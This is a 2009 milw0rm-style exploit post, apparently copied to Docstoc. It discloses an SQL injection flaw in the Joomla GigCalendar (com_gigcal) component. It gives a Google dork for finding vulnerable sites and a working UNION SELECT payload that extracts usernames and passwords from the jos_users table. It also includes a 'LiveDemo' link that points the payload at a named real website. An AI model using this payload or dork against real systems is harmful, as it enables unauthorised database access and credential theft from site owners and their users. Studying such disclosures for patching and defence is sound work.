Docstoc

Joomla Component com_gigcal gigcal_gigs_id SQL Injection Vuln

Document Sample
Joomla Component com_gigcal gigcal_gigs_id SQL Injection Vuln Powered By Docstoc
					                   Joomla Component com_gigcal gigcal_gigs_id SQL Injection Vuln                                     Page 1/1
  1    #############################################################
  2    Joomla Component com_gigcal(gigcal_gigs_id) SQL−injection
  3    #############################################################
  4
  5
  6    ###################################################
  7    #[~] Author        : boom3rang
  8    #[~] Greetz        : H!tm@N, KHG, chs, redc00de, pr0xy−ki11er, LiTTle−Hack3r, L1RIDON1.
  9    #[~] Vulnerability : SQL injection
  10   #[~] Google Dork   : inurl:com_gigcal
  11   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  12   #[!] Name          : GigCalendar
  13   #[!] creationDate : Dec 2005
  14   #[!] Created by    : Graham Spice, David Richards
  15   #[!] AuthorEmail   : capt@gigcalendar.net
  16   #[!] Site          : www.gigcalendar.net
  17   #[!] Version       : 1.0
  18   #[!] Download      : http://joomlacode.org/gf/project/gigcalendar/frs/?action=FrsReleaseBrowse&frs_package_id=214
  19   ###################################################
  20
  21
  22   [−] Example:
  23   http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id=[Exploit]
  24
  25
  26   [−] Exploit:
  27   ’+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
  28
  29
  30   [−] LiveDemo:
  31   http://dromnyc.com/home/index.php?option=com_gigcal&task=details&gigcal_gigs_id=402’+and+1=2/**/UNION/**/SELECT/**/1,
       2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*&Itemid=37
  32
  33
  34   ##############################
  35   #[!] Proud 2 be Albanian
  36   #[!] Proud 2 be Muslim
  37   #[!] United States of Albania
  38   #[!] Free Palestine
  39   ##############################
  40
  41   # milw0rm.com [2009−01−13]




boom3rang                                                                                                            01/13/2009

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:77
posted:5/23/2010
language:English
pages:1